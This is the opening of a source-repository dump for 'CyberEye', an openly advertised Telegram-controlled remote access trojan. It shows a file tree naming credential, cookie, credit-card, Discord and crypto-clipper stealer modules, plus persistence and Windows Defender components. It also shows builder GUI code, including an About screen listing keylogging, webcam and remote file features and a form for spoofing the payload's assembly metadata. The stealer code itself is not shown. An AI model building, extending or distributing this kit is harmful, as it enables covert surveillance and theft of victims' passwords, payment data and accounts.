├── .gitignore ├── CyberEye.Client.Builder ├── App.config ├── CyberEye.Client.Builder.csproj ├── FrmAbout.Designer.cs ├── FrmAbout.cs ├── FrmAbout.resx ├── FrmAssemblyChanger.Designer.cs ├── FrmAssemblyChanger.cs ├── FrmAssemblyChanger.resx ├── FrmBuild.Designer.cs ├── FrmBuild.cs ├── FrmBuild.resx ├── Program.cs ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings └── Resources │ └── cybereye.jpg ├── LICENSE ├── README.md ├── TelegramRAT.sln ├── TelegramRAT ├── Program.cs ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ └── Resources.resx ├── TelegramRAT.csproj ├── app.config ├── config.cs ├── core │ ├── SimpleJSON.cs │ ├── commands.cs │ ├── core.cs │ ├── libs │ │ ├── 7zr.exe │ │ ├── AudioSwitcher.AudioApi.CoreAudio.dll │ │ ├── AudioSwitcher.AudioApi.dll │ │ ├── BugReport.exe │ │ ├── Sodium.dll │ │ ├── libsodium-64.dll │ │ └── libsodium.dll │ ├── persistence.cs │ ├── stealer │ │ ├── AutoStealer.cs │ │ ├── Bookmarks.cs │ │ ├── Cookies.cs │ │ ├── CreditCards.cs │ │ ├── Crypt.cs │ │ ├── DPAPI.cs │ │ ├── Discord.cs │ │ ├── FileZilla.cs │ │ ├── GrabDesktop.cs │ │ ├── History.cs │ │ ├── Passwords.cs │ │ ├── SQLite.cs │ │ ├── Steam.cs │ │ ├── Telegram.cs │ │ └── clipper.cs │ ├── telegram.cs │ └── utils.cs └── modded │ ├── Fun │ ├── Beep.cs │ ├── CustomMsgBox.cs │ ├── Cycle.cs │ └── SetRandomCurPos.cs │ ├── Sys │ ├── Compiler.cs │ ├── HideOrUnhideDir.cs │ ├── Regedit.cs │ ├── Wifi_Steal.cs │ └── WinDefend.cs │ └── stealer │ └── Minecraft.cs ├── images ├── Builder.jpg ├── BuilderBuild.jpg ├── DownloadAndUnzipBuilder.jpg ├── ExecuteBuilder.jpg ├── build.JPG ├── chatidBot.JPG ├── createBot.JPG ├── loadSourceCode.JPG ├── logo.jpg ├── openConfig.JPG ├── openMalware.JPG ├── saveConfig.JPG └── vs.JPG ├── logo.jpg ├── moddedLog.txt └── version.txt /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.) 298 | *.vbp 299 | 300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project) 301 | *.dsw 302 | *.dsp 303 | 304 | # Visual Studio 6 technical files 305 | *.ncb 306 | *.aps 307 | 308 | # Visual Studio LightSwitch build output 309 | **/*.HTMLClient/GeneratedArtifacts 310 | **/*.DesktopClient/GeneratedArtifacts 311 | **/*.DesktopClient/ModelManifest.xml 312 | **/*.Server/GeneratedArtifacts 313 | **/*.Server/ModelManifest.xml 314 | _Pvt_Extensions 315 | 316 | # Paket dependency manager 317 | .paket/paket.exe 318 | paket-files/ 319 | 320 | # FAKE - F# Make 321 | .fake/ 322 | 323 | # CodeRush personal settings 324 | .cr/personal 325 | 326 | # Python Tools for Visual Studio (PTVS) 327 | __pycache__/ 328 | *.pyc 329 | 330 | # Cake - Uncomment if you are using it 331 | # tools/** 332 | # !tools/packages.config 333 | 334 | # Tabs Studio 335 | *.tss 336 | 337 | # Telerik's JustMock configuration file 338 | *.jmconfig 339 | 340 | # BizTalk build output 341 | *.btp.cs 342 | *.btm.cs 343 | *.odx.cs 344 | *.xsd.cs 345 | 346 | # OpenCover UI analysis results 347 | OpenCover/ 348 | 349 | # Azure Stream Analytics local run output 350 | ASALocalRun/ 351 | 352 | # MSBuild Binary and Structured Log 353 | *.binlog 354 | 355 | # NVidia Nsight GPU debugger configuration file 356 | *.nvuser 357 | 358 | # MFractors (Xamarin productivity tool) working folder 359 | .mfractor/ 360 | 361 | # Local History for Visual Studio 362 | .localhistory/ 363 | 364 | # Visual Studio History (VSHistory) files 365 | .vshistory/ 366 | 367 | # BeatPulse healthcheck temp database 368 | healthchecksdb 369 | 370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 371 | MigrationBackup/ 372 | 373 | # Ionide (cross platform F# VS Code tools) working folder 374 | .ionide/ 375 | 376 | # Fody - auto-generated XML schema 377 | FodyWeavers.xsd 378 | 379 | # VS Code files for those working on multiple tools 380 | .vscode/* 381 | !.vscode/settings.json 382 | !.vscode/tasks.json 383 | !.vscode/launch.json 384 | !.vscode/extensions.json 385 | *.code-workspace 386 | 387 | # Local History for Visual Studio Code 388 | .history/ 389 | 390 | # Windows Installer files from build outputs 391 | *.cab 392 | *.msi 393 | *.msix 394 | *.msm 395 | *.msp 396 | 397 | # JetBrains Rider 398 | *.sln.iml 399 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/CyberEye.Client.Builder.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {052597A3-D8B3-470E-BA24-E782333DC7F6} 8 | WinExe 9 | CyberEye.Client.Builder 10 | CyberEye.Client.Builder 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | Form 51 | 52 | 53 | FrmAbout.cs 54 | 55 | 56 | Form 57 | 58 | 59 | FrmAssemblyChanger.cs 60 | 61 | 62 | Form 63 | 64 | 65 | FrmBuild.cs 66 | 67 | 68 | 69 | 70 | FrmAbout.cs 71 | 72 | 73 | FrmAssemblyChanger.cs 74 | 75 | 76 | FrmBuild.cs 77 | 78 | 79 | ResXFileCodeGenerator 80 | Resources.Designer.cs 81 | Designer 82 | 83 | 84 | True 85 | Resources.resx 86 | True 87 | 88 | 89 | SettingsSingleFileGenerator 90 | Settings.Designer.cs 91 | 92 | 93 | True 94 | Settings.settings 95 | True 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAbout.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace CyberEye.Client.Builder 2 | { 3 | partial class FrmAbout 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | this.components = new System.ComponentModel.Container(); 32 | this.pictureBox1 = new System.Windows.Forms.PictureBox(); 33 | this.pictureBox2 = new System.Windows.Forms.PictureBox(); 34 | this.label1 = new System.Windows.Forms.Label(); 35 | this.timer1 = new System.Windows.Forms.Timer(this.components); 36 | this.timer2 = new System.Windows.Forms.Timer(this.components); 37 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); 38 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox2)).BeginInit(); 39 | this.SuspendLayout(); 40 | // 41 | // pictureBox1 42 | // 43 | this.pictureBox1.Location = new System.Drawing.Point(-5, -7); 44 | this.pictureBox1.Name = "pictureBox1"; 45 | this.pictureBox1.Size = new System.Drawing.Size(817, 469); 46 | this.pictureBox1.TabIndex = 0; 47 | this.pictureBox1.TabStop = false; 48 | // 49 | // pictureBox2 50 | // 51 | this.pictureBox2.Image = global::CyberEye.Client.Builder.Properties.Resources.cybereye; 52 | this.pictureBox2.Location = new System.Drawing.Point(-306, -195); 53 | this.pictureBox2.Name = "pictureBox2"; 54 | this.pictureBox2.Size = new System.Drawing.Size(863, 729); 55 | this.pictureBox2.TabIndex = 1; 56 | this.pictureBox2.TabStop = false; 57 | // 58 | // label1 59 | // 60 | this.label1.BackColor = System.Drawing.SystemColors.ActiveCaptionText; 61 | this.label1.Dock = System.Windows.Forms.DockStyle.Fill; 62 | this.label1.Font = new System.Drawing.Font("Consolas", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 63 | this.label1.Location = new System.Drawing.Point(0, 0); 64 | this.label1.Name = "label1"; 65 | this.label1.Size = new System.Drawing.Size(416, 261); 66 | this.label1.TabIndex = 2; 67 | this.label1.Text = "CyberEye"; 68 | // 69 | // timer1 70 | // 71 | this.timer1.Interval = 50; 72 | this.timer1.Tick += new System.EventHandler(this.timer1_Tick); 73 | // 74 | // timer2 75 | // 76 | this.timer2.Interval = 500; 77 | this.timer2.Tick += new System.EventHandler(this.timer2_Tick); 78 | // 79 | // FrmAbout 80 | // 81 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); 82 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 83 | this.ClientSize = new System.Drawing.Size(416, 261); 84 | this.Controls.Add(this.label1); 85 | this.Controls.Add(this.pictureBox2); 86 | this.Controls.Add(this.pictureBox1); 87 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle; 88 | this.Name = "FrmAbout"; 89 | this.Text = "FrmAbout"; 90 | this.Load += new System.EventHandler(this.FrmAbout_Load); 91 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); 92 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox2)).EndInit(); 93 | this.ResumeLayout(false); 94 | 95 | } 96 | 97 | #endregion 98 | 99 | private System.Windows.Forms.PictureBox pictureBox1; 100 | private System.Windows.Forms.PictureBox pictureBox2; 101 | private System.Windows.Forms.Label label1; 102 | private System.Windows.Forms.Timer timer1; 103 | private System.Windows.Forms.Timer timer2; 104 | } 105 | } -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAbout.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | using System; 8 | using System.Drawing; 9 | using System.Windows.Forms; 10 | 11 | namespace CyberEye.Client.Builder 12 | { 13 | public partial class FrmAbout : Form 14 | { 15 | private int i = 0; 16 | private string aboutText = 17 | "Project: CyberEye Telegram RAT" + Environment.NewLine + 18 | "Version: 1.0.2" + Environment.NewLine + 19 | "Coded & Modded by: Cisamu AKA cisamu123" + Environment.NewLine + 20 | "Telegram API: HTTP Requests" + Environment.NewLine + 21 | "Keylogger: Custom implementation based on .NET low-level hooks" + Environment.NewLine + 22 | "Screen Capture: .NET Graphics API" + Environment.NewLine + 23 | "Webcam Support: CommandCam" + Environment.NewLine + 24 | "File Manager: Remote file browsing and manipulation" + Environment.NewLine + 25 | "Special Thanks to: LimerBoy, njq8 ,open-source community and the creator of NJRat 0.7D Horror Edition 2022 for providing the open-source code that helped in the development of CyberEye." + Environment.NewLine + 26 | "GitHub: https://github.com/cisamu123/CyberEye" + Environment.NewLine + 27 | "Telegram Channel: https://t.me/Cisamu" + Environment.NewLine + 28 | "Telegram Contact: https://t.me/CodQu" + Environment.NewLine + 29 | "----------------------------------------------------------"; 30 | public FrmAbout() 31 | { 32 | InitializeComponent(); 33 | } 34 | 35 | private void FrmAbout_Load(object sender, EventArgs e) 36 | { 37 | label1.ForeColor = Color.White; 38 | label1.Text = string.Empty; 39 | timer1.Start(); 40 | timer2.Start(); 41 | } 42 | 43 | private void timer1_Tick(object sender, EventArgs e) 44 | { 45 | if (i < aboutText.Length) 46 | { 47 | label1.Text += aboutText[i]; 48 | i++; 49 | } 50 | else 51 | { 52 | timer1.Stop(); 53 | } 54 | } 55 | 56 | private void timer2_Tick(object sender, EventArgs e) 57 | { 58 | if (label1.ForeColor == Color.White) 59 | label1.ForeColor = Color.Yellow; 60 | else if (label1.ForeColor == Color.Yellow) 61 | label1.ForeColor = Color.Red; 62 | else 63 | label1.ForeColor = Color.White; 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAbout.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 105, 17 125 | 126 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAssemblyChanger.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace CyberEye.Client.Builder 2 | { 3 | partial class FrmAssemblyChanger 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | this.pictureBox1 = new System.Windows.Forms.PictureBox(); 32 | this.label1 = new System.Windows.Forms.Label(); 33 | this.label2 = new System.Windows.Forms.Label(); 34 | this.label3 = new System.Windows.Forms.Label(); 35 | this.textBox1 = new System.Windows.Forms.TextBox(); 36 | this.textBox2 = new System.Windows.Forms.TextBox(); 37 | this.textBox3 = new System.Windows.Forms.TextBox(); 38 | this.textBox4 = new System.Windows.Forms.TextBox(); 39 | this.textBox5 = new System.Windows.Forms.TextBox(); 40 | this.textBox6 = new System.Windows.Forms.TextBox(); 41 | this.textBox7 = new System.Windows.Forms.TextBox(); 42 | this.textBox8 = new System.Windows.Forms.TextBox(); 43 | this.textBox9 = new System.Windows.Forms.TextBox(); 44 | this.textBox10 = new System.Windows.Forms.TextBox(); 45 | this.label4 = new System.Windows.Forms.Label(); 46 | this.label5 = new System.Windows.Forms.Label(); 47 | this.label6 = new System.Windows.Forms.Label(); 48 | this.label7 = new System.Windows.Forms.Label(); 49 | this.label8 = new System.Windows.Forms.Label(); 50 | this.label9 = new System.Windows.Forms.Label(); 51 | this.label10 = new System.Windows.Forms.Label(); 52 | this.label11 = new System.Windows.Forms.Label(); 53 | this.label12 = new System.Windows.Forms.Label(); 54 | this.label13 = new System.Windows.Forms.Label(); 55 | this.button1 = new System.Windows.Forms.Button(); 56 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); 57 | this.SuspendLayout(); 58 | // 59 | // pictureBox1 60 | // 61 | this.pictureBox1.Image = global::CyberEye.Client.Builder.Properties.Resources.cybereye; 62 | this.pictureBox1.Location = new System.Drawing.Point(-263, -263); 63 | this.pictureBox1.Name = "pictureBox1"; 64 | this.pictureBox1.Size = new System.Drawing.Size(1411, 827); 65 | this.pictureBox1.TabIndex = 0; 66 | this.pictureBox1.TabStop = false; 67 | // 68 | // label1 69 | // 70 | this.label1.AutoSize = true; 71 | this.label1.Location = new System.Drawing.Point(123, 28); 72 | this.label1.Name = "label1"; 73 | this.label1.Size = new System.Drawing.Size(0, 13); 74 | this.label1.TabIndex = 1; 75 | // 76 | // label2 77 | // 78 | this.label2.AutoSize = true; 79 | this.label2.Location = new System.Drawing.Point(2, 317); 80 | this.label2.Name = "label2"; 81 | this.label2.Size = new System.Drawing.Size(342, 13); 82 | this.label2.TabIndex = 2; 83 | this.label2.Text = "Cyber Eye Assembly Changer https://github.com/cisamu123/CyberEye"; 84 | // 85 | // label3 86 | // 87 | this.label3.AutoSize = true; 88 | this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 20.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 89 | this.label3.Location = new System.Drawing.Point(9, 13); 90 | this.label3.Name = "label3"; 91 | this.label3.Size = new System.Drawing.Size(259, 31); 92 | this.label3.TabIndex = 3; 93 | this.label3.Text = "Assembly Changer"; 94 | // 95 | // textBox1 96 | // 97 | this.textBox1.Location = new System.Drawing.Point(131, 54); 98 | this.textBox1.Name = "textBox1"; 99 | this.textBox1.Size = new System.Drawing.Size(286, 20); 100 | this.textBox1.TabIndex = 4; 101 | this.textBox1.Text = "TelegramRAT (CyberEye) Modded"; 102 | // 103 | // textBox2 104 | // 105 | this.textBox2.Location = new System.Drawing.Point(188, 78); 106 | this.textBox2.Name = "textBox2"; 107 | this.textBox2.Size = new System.Drawing.Size(229, 20); 108 | this.textBox2.TabIndex = 5; 109 | // 110 | // textBox3 111 | // 112 | this.textBox3.Location = new System.Drawing.Point(205, 106); 113 | this.textBox3.Name = "textBox3"; 114 | this.textBox3.Size = new System.Drawing.Size(211, 20); 115 | this.textBox3.TabIndex = 6; 116 | // 117 | // textBox4 118 | // 119 | this.textBox4.Location = new System.Drawing.Point(171, 132); 120 | this.textBox4.Name = "textBox4"; 121 | this.textBox4.Size = new System.Drawing.Size(245, 20); 122 | this.textBox4.TabIndex = 7; 123 | // 124 | // textBox5 125 | // 126 | this.textBox5.Location = new System.Drawing.Point(159, 158); 127 | this.textBox5.Name = "textBox5"; 128 | this.textBox5.Size = new System.Drawing.Size(257, 20); 129 | this.textBox5.TabIndex = 8; 130 | this.textBox5.Text = "TelegramRAT (CyberEye) Modded"; 131 | // 132 | // textBox6 133 | // 134 | this.textBox6.Location = new System.Drawing.Point(171, 186); 135 | this.textBox6.Name = "textBox6"; 136 | this.textBox6.Size = new System.Drawing.Size(244, 20); 137 | this.textBox6.TabIndex = 9; 138 | this.textBox6.Text = "Copyright © 2023"; 139 | // 140 | // textBox7 141 | // 142 | this.textBox7.Location = new System.Drawing.Point(182, 210); 143 | this.textBox7.Name = "textBox7"; 144 | this.textBox7.Size = new System.Drawing.Size(234, 20); 145 | this.textBox7.TabIndex = 10; 146 | // 147 | // textBox8 148 | // 149 | this.textBox8.Location = new System.Drawing.Point(155, 236); 150 | this.textBox8.Name = "textBox8"; 151 | this.textBox8.Size = new System.Drawing.Size(261, 20); 152 | this.textBox8.TabIndex = 11; 153 | // 154 | // textBox9 155 | // 156 | this.textBox9.Location = new System.Drawing.Point(158, 264); 157 | this.textBox9.Name = "textBox9"; 158 | this.textBox9.Size = new System.Drawing.Size(257, 20); 159 | this.textBox9.TabIndex = 12; 160 | this.textBox9.Text = "1.0.2"; 161 | // 162 | // textBox10 163 | // 164 | this.textBox10.Location = new System.Drawing.Point(187, 290); 165 | this.textBox10.Name = "textBox10"; 166 | this.textBox10.Size = new System.Drawing.Size(229, 20); 167 | this.textBox10.TabIndex = 13; 168 | this.textBox10.Text = "1.0.2"; 169 | // 170 | // label4 171 | // 172 | this.label4.AutoSize = true; 173 | this.label4.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 174 | this.label4.Location = new System.Drawing.Point(1, 52); 175 | this.label4.Name = "label4"; 176 | this.label4.Size = new System.Drawing.Size(124, 20); 177 | this.label4.TabIndex = 14; 178 | this.label4.Text = "Assembly Title"; 179 | // 180 | // label5 181 | // 182 | this.label5.AutoSize = true; 183 | this.label5.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 184 | this.label5.Location = new System.Drawing.Point(1, 78); 185 | this.label5.Name = "label5"; 186 | this.label5.Size = new System.Drawing.Size(181, 20); 187 | this.label5.TabIndex = 15; 188 | this.label5.Text = "Assembly Description"; 189 | // 190 | // label6 191 | // 192 | this.label6.AutoSize = true; 193 | this.label6.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 194 | this.label6.Location = new System.Drawing.Point(1, 106); 195 | this.label6.Name = "label6"; 196 | this.label6.Size = new System.Drawing.Size(198, 20); 197 | this.label6.TabIndex = 16; 198 | this.label6.Text = "Assembly Configuration"; 199 | // 200 | // label7 201 | // 202 | this.label7.AutoSize = true; 203 | this.label7.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 204 | this.label7.Location = new System.Drawing.Point(1, 186); 205 | this.label7.Name = "label7"; 206 | this.label7.Size = new System.Drawing.Size(166, 20); 207 | this.label7.TabIndex = 19; 208 | this.label7.Text = "Assembly Copyright"; 209 | // 210 | // label8 211 | // 212 | this.label8.AutoSize = true; 213 | this.label8.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 214 | this.label8.Location = new System.Drawing.Point(1, 158); 215 | this.label8.Name = "label8"; 216 | this.label8.Size = new System.Drawing.Size(152, 20); 217 | this.label8.TabIndex = 18; 218 | this.label8.Text = "Assembly Product"; 219 | // 220 | // label9 221 | // 222 | this.label9.AutoSize = true; 223 | this.label9.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 224 | this.label9.Location = new System.Drawing.Point(1, 132); 225 | this.label9.Name = "label9"; 226 | this.label9.Size = new System.Drawing.Size(164, 20); 227 | this.label9.TabIndex = 17; 228 | this.label9.Text = "Assembly Company"; 229 | // 230 | // label10 231 | // 232 | this.label10.AutoSize = true; 233 | this.label10.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, 